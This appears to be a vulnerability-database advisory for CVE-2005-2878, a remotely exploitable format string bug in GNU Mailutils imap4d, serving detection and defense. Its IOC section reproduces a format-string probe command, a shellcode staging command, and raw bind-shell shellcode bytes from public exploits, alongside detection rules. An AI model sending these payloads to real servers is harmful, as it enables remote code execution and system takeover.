CVE-2005-2878
published 2005-09-13


Priority: P347
Severity: high (CVSS 2.0 base score 7.5)
CVSS 2.0 vector: AV:N/AC:L/Au:N/C:P/I:P/A:P
Exploit: yes (public PoCs exist; see detection notes below)
EPSS: 14.57% (96.2 percentile)
Format string vulnerability in search.c in the imap4d server in GNU Mailutils 0.6 allows remote authenticated users to execute arbitrary code via format string specifiers in the SEARCH command.

Affected (6 ranges)

Vendor   Product    Version range                          Fixed in
debian   mailutils  < mailutils 1:0.6.90-3 (bookworm)      mailutils 1:0.6.90-3 (bookworm)
gnu      mailutils  (no range given)                       (none given)
gnu      mailutils  >= 0, < 1:0.6.90-3                     1:0.6.90-3
gnu      mailutils  >= 0, < 1:0.6.90-3                     1:0.6.90-3
gnu      mailutils  >= 0, < 1:0.6.90-3                     1:0.6.90-3
gnu      mailutils  >= 0, < 1:0.6.90-3                     1:0.6.90-3

Detection & IOCs (extracted from sources)

port: 143
command: SEARCH TOPIC <format_string_payload>
command: 3 search topic .AAAABBBB%%%d$x
command: 3 LIST <padding+shellcode>
bytes: \x31\xc0\x50\x40\x89\xc3\x50\x40\x50\x89\xe1\xb0\x66\xcd\x80\x31\xd2\x52\x66\x68\x13\xd2\x43\x66\x53\x89\xe1\x6a\x10\x51\x50\x89\xe1\xb0\x66\xcd\x80\x40\x89\x44\x24\x04\x43\x43\xb0\x66\xcd\x80\x83\xc4\x0c\x52\x52\x43\xb0\x66\xcd\x80\x93\x89\xd1\xb0\x3f\xcd\x80\x41\x80\xf9\x03\x75\xf6\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80
bytes: \x31\xc0\x31\xc0\x50\x31\xc0\x50\xb0\x7e\x50\xcd\x80
  • Detect IMAP SEARCH commands containing printf-style format specifiers (e.g., %d$x, %hn, %.Nx) in the search criteria — this is the direct exploitation vector in search.c
  • Monitor IMAP traffic on port 143 for SEARCH TOPIC commands containing sequences matching %[0-9]+\$[xhn] or %.[0-9]+x patterns, indicative of format string exploitation attempts
  • Alert on imap4d processes spawning unexpected child processes (e.g., xterm, /bin/sh, nc) or making outbound connections — post-exploitation indicator for this format string RCE
  • Watch for IMAP LIST commands with oversized payloads (~1024 bytes padded with 0x41) followed by embedded shellcode — used to stage shellcode in imap4d rwx address space before triggering the format string
  • Detect new listening ports 30464 or 5074 opened by imap4d or its child processes — these are the bind-shell ports used by the exploit payloads
  • Brute-force offset discovery pattern: repeated SEARCH TOPIC commands with incrementing numeric format string offsets (e.g., %1$x, %2$x … %N$x) looking for 0x41414141 in the response — indicates active exploitation reconnaissance
  • Exploit hardcoded addresses (DTOR_END_ADDR, got_entry, IO_file_close, addr) are OS/build-specific; detections based on these exact values will only match the specific target configurations used in the published PoCs (Fedora Core 6, FreeBSD, Debian etch)
  • Exploitation requires prior authentication (remote authenticated users); unauthenticated SEARCH commands cannot trigger this vulnerability

CVSS provenance

nvd: CVSS v2.0, 7.5 HIGH, AV:N/AC:L/Au:N/C:P/I:P/A:P
osv: 7.5 HIGH
vendor_debian: 7.5 HIGH